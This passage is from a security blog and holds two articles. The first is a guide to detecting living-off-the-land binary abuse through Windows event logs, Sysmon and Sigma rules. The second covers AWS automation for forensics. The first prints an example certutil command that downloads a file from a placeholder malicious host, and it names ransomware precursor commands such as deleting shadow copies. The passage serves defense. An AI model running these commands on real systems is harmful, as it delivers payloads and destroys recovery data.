LOLBAS because the executables involved are usually Microsoft-signed binaries, which are seen as legitimate. Parent Command Line : The parent process command line can be very informative in some situations, especially when exploring more advanced attack chains. However, for many LOLBAS hunts, it might just indicate cmd.exe or explorer.exe, which are often used as the parent processes in these attacks. 2. Windows Security Event 4688 (Process Creation) Windows Security Event 4688  is another valuable source for capturing process creation data. For LOLBAS hunting, focusing on a few key fields in Event 4688 is particularly useful: Parent Process : Although often cmd.exe or explorer.exe , this information can reveal if the process was initiated by a legitimate GUI or a script , or if it was spawned by a more suspicious process like w3wp.exe (IIS) running CertUtil.exe. If the parent process is something like IIS or a PowerShell script , it suggests automation or an attack executed remotely (e.g., via a webshell). Process Command Line : This is critical because it includes any arguments passed to the executable . In LOLBAS attacks, unusual command-line switches or paths used by trusted binaries (like CertUtil.exe -urlcache) can reveal malicious intent. Token Elevation Type : %%1936 : Full token with all privileges, suggesting no UAC restriction . %%1937 : Elevated privileges, indicating that a user has explicitly run the application with “Run as Administrator.” %%1938 : Normal user privileges. These indicators are helpful to see if the binary was executed with elevated permissions , which could hint at privilege escalation attempts. 3. Windows Firewall Event Logs for LOLBAS Detection Firewalls can provide additional information about LOLBAS activities , particularly in relation to network-based attacks . Event logs such as 5156  (allowed connection) or 5158  (port binding) can help spot outbound connections initiated by LOLBAS binaries like CertUtil.exe or Bitsadmin.exe. Key fields in firewall logs: Process ID/Application Name : This tells you which binary initiated the network connection. Tracking legitimate but rarely used binaries (e.g., CertUtil) making outbound connections to unusual IP addresses can indicate an attack. Destination IP Address : Correlating this with known good IPs or threat intelligence data is critical to confirm whether the connection is benign or suspicious. 4. Event Log Analysis for LOLBAS For deeper LOLBAS detection, multiple event logs should be analyzed together: 4688 : Logs the start of a process (the key event for initial execution detection). 4689 : Logs the end of a process , providing insights into how long the process was running and whether it completed successfully. 5156 and 5158 : Track firewall events, focusing on port binding and outbound connections. Any outbound traffic initiated by unusual executables like Bitsadmin.exe or CertUtil.exe should be scrutinized. 5. Detecting Ransomware Precursors with LOLBAS Many ransomware attacks involve the use of LOLBAS commands to weaken defenses or prepare the environment for encryption: Disabling security tools : Commands like taskkill.exe or net stop are used to terminate processes that protect the system . Firewall/ACL modifications : netsh.exe might be used to modify firewall rules to allow external connections. Taking ownership of files : This ensures the ransomware can encrypt files unhindered. Disabling backups/Volume Shadow Copies : Commands like vssadmin.exe delete shadows are common to prevent file recovery. Since these activities often involve legitimate system tools, auditing these actions can serve as an early warning. 6. Improving Detection with Windows Auditing For better detection of LOLBAS attacks and ransomware precursors, implement the following Windows auditing  settings: Process Creation Auditing : Auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable This ensures that every process creation event is logged, which is crucial for identifying LOLBAS activity. Command Line Auditing : reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 Enabling command-line logging is crucial because LOLBAS binaries often need unusual arguments to perform malicious actions. PowerShell Logging : reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1 reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1 PowerShell script block logging captures the full content of commands executed within PowerShell, which is a key LOLBAS tool used for various attacks. 7. Sysmon: Enhanced Visibility for LOLBAS Deploying Sysmon  enhances your visibility into system activities, especially for LOLBAS detection: File Hashes : Sysmon captures the hash of the executing file , which is less helpful for LOLBAS as these files are usually legitimate. However, the combination of the file hash with process execution data can still provide context. Process Command Line : Sysmon logs detailed command-line arguments, which are crucial for spotting LOLBAS attacks . The presence of rarely used switches or network connections from unexpected binaries is a red flag. Because Sysmon captures more detailed process creation data than Windows Security Events, it’s a preferred tool for more advanced hunting, especially when dealing with stealthy attacks involving LOLBAS tools. 8. Sigma Rules for LOLBAS Detection Sigma rules provide a framework for creating reusable detection logic that can work across different platforms and SIEM solutions. Using Sigma, you can write detection logic in a human-readable format and then convert it into SIEM-specific queries using tools like Uncoder.io . Advantages of Sigma : Detection logic is SIEM-agnostic . This allows you to use the same detection rules even if your organization switches SIEM platforms. Sigma rules can be easily integrated with Sysmon , Windows Security Events , and other logging tools, making them highly adaptable. By using Sigma for LOLBAS detection, you ensure consistent alerts across all environments. 9. Practical Example of LOLBAS Detection: CertUtil Here’s an example of how CertUtil.exe  might be used in an attack: certutil.exe -urlcache -split -f http[:]//malicious-site[.]com/evilfile.exe goodfile.exe This command downloads a file from a remote server and stores it on the local system. While CertUtil  is a legitimate Windows tool for managing certificates, it can be misused for file downloads. Sysmon Event 1 : You would capture the process command line   and see the -urlcache argument, which is rare in normal usage. Firewall Event 5156 : Logs the connection attempt from CertUtil.exe   to the malicious IP. Security Event 4688 : Logs the creation of CertUtil.exe , providing the process ID and command-line arguments. Conclusion: Effectively hunting LOLBAS and fileless malware requires a combination of detailed event logging, process monitoring, prefetch analysis, and centralized log management. By leveraging tools like Sysmon , Velociraptor , and Sigma, organizations can strengthen their detection capabilities and proactively defend against stealthy attacks that rely on legitimate system tools to evade traditional security measures. Akash Patel

  • Leveraging Automation in AWS for Digital Forensics and Incident Response

    For those of us working in digital forensics  and incident response (DFIR) , keeping up with the cloud revolution can feel overwhelming at times. We're experts in tracking down security incidents and understanding what went wrong, but many of us aren't DevOps engineers  by trade. That’s okay—it’s not necessary to become a full-time cloud architect to take advantage of the powerful automation tools  and workflows available in platforms like AWS . Instead, we can collaborate with engineers and developers who specialize in these areas to create effective, scalable solutions that align with our needs. ----------------------------------------------------------------------------------------------------------- Getting Started with Cloud-Based Forensics For those who are new to the cloud or want a quick start to cloud forensics, A mazon Machine Images (AMIs)  are a great option. AMIs are pre-configured templates that contain the information required to launch an instance . If you’re not yet ready to build your own custom AMI, there are existing ones you can use. SIFT (SANS Investigative Forensic Toolkit)  is a popular option for forensics analysis and is available as an AMI. While it’s not listed on the official AWS Marketplace, you can find the latest AMI IDs on the github page and launch them from the EC2 console. https://github.com/teamdfir/sift#aws Security Onion  is another robust tool for network monitoring and intrusion detection. They publish their releases as AMIs, although there’s a small charge to cover regular update services. If you want full control, you can build your own AMI from their free distribution. As your team grows in its cloud forensics capabilities, you may want to create custom AMIs  to fit specific use cases . EC2 Image Builder  is a helpful AWS service that makes it easy to create and update AMIs, complete with patches and any necessary updates. This ensures that you always have a reliable, up-to-date image for your incident response efforts. ----------------------------------------------------------------------------------------------------------- Infrastructure-as-Code: A Scalable Approach to Forensics Environments As your organization expands its cloud infrastructure, it's essential to deploy forensics environments quickly and consistently. This is where Infrastructure-as-Code (IaC)  comes into play. IaC allows you to define and manage your cloud resources using code, making environments easily repeatable and reducing the risk of configuration drift. One of the key principles of IaC is idempotence . This means that, no matter the current state of your environment, running the IaC script will bring everything to the desired state. This makes it easier to ensure that forensic environments are deployed consistently and accurately every time. ----------------------------------------------------------------------------------------------------------- CloudFormation and Terraform A WS provides its own IaC tool called CloudFormation , which uses JSON  or YAML  files to define and automate resource configurations . AWS also offers CloudFormation templates  for various use cases, including incident response workflows. These templates can be adapted to fit your specific needs, making it easy to set up response environments quickly. You can explore some ready-to-use templates. https://aws.amazon.com/cloudformation/resources/templates/ However, if your organization operates across multiple cloud providers—such as Azure , Google Cloud , or DigitalOcean — you might prefer an agnostic solution like Terraform . Terraform, developed by HashiCorp , allows you to write a single set of scripts that can be applied to various cloud platforms, streamlining deployment across your entire infrastructure. ----------------------------------------------------------------------------------------------------------- Automating Forensic Tasks with AWS Lambda One of the most exciting aspects of cloud-based forensics is the potential for automation , and AWS Lambda  is a key player in this space. Lambda lets you run code without provisioning servers, and it’s event-driven , meaning it automatically executes tasks in response to certain triggers . This is perfect for incident response, where every second counts. https://aws.amazon.com/lambda/faqs/ For example, let’s say you’ve set up a write-only S3 bucket  for triage data. Lambda can be triggered whenever a new file is uploaded, automatically kicking off a series of actions such as running a triage analysis script or notifying your response team. The best part is that you’re only charged for the execution time, not for keeping a server running 24/7. Lambda supports multiple programming languages, including Python , Node.js , Java , Go , Ruby , C# , and PowerShell . This flexibility makes it easy to integrate with existing workflows, no matter what scripting languages you’re comfortable with. https://github.com/awslabs/ ----------------------------------------------------------------------------------------------------------- AWS Step Functions: Orchestrating Complex Workflows While Lambda excels at executing individual tasks, AWS Step Functions  allow you to orchestrate complex, multi-step workflows . In the context of incident response, this means you can automate an entire forensics investigation, from capturing an EC2 snapshot to running analysis scripts and generating reports. One example of a Step Function workflow comes from the AWS Labs  project titled “EC2 Auto Clean Room Forensics ” . Here’s how the workflow operates: Capture a snapshot  of the target EC2 instance’s volumes. Notify the team via Slack  that the snapshot is complete. Isolate  the compromised EC2 instance. Create a pristine analysis instance  and mount the snapshot. Use the AWS Systems Manager (SSM)  agent to run forensic scripts on the instance. Generate a detailed report. Notify the team when the investigation is complete. This kind of automation significantly speeds up the forensic process, allowing your team to focus on higher-level analysis rather than repetitive tasks. ----------------------------------------------------------------------------------------------------------- Other Automation Options for Forensics in the Cloud If you don’t have the resources or time to dive deep into AWS-specific solutions, there are plenty of other automation options available that work across cloud platforms. For instance, dfTimewolf , developed by Google’s IR team , is a Python-based framework designed for automating DFIR workflows. It includes recipes for AWS, Google Cloud Platform (GCP) , and Azure , allowing you to streamline evidence staging and processing across multiple cloud environments. Alternatively, if you’re comfortable with shell scripting  and the AWS CLI , you can develop your own lightweight automation scripts. For example, R econ InfoSec  has released a simple yet powerful project that ingests triage data from S3 and processes it in Timesketch . This is an excellent way to automate data handling without building a complex pipeline from scratch. https://dftimewolf.readthedocs.io/en/latest/developers-guide.html https://libcloud.apache.org/index.html ----------------------------------------------------------------------------------------------------------- The Importance of Practice in Cloud Incident Response Automation can dramatically improve your response times and overall efficiency, but it’s essential to practice these workflows regularly. Cloud technology evolves rapidly, and so do the risks associated with it. By practicing response scenarios—whether using AWS Step Functions , Terraform , or even simple CLI scripts —you can identify gaps in your processes and make improvements before a real incident occurs. AWS also provides several incident response simulations  that allow you to practice responding to real-world scenarios. These are excellent resources to test your workflows and ensure that your team is always ready. ----------------------------------------------------------------------------------------------------------- Conclusion Stay proactive by experimenting with these technologies, practicing regularly, and continuously refining your workflows. Cloud adoption is accelerating, and with it comes the need for robust, automated incident response strategies that can keep up with this evolving landscape Akash Patel

bottom of page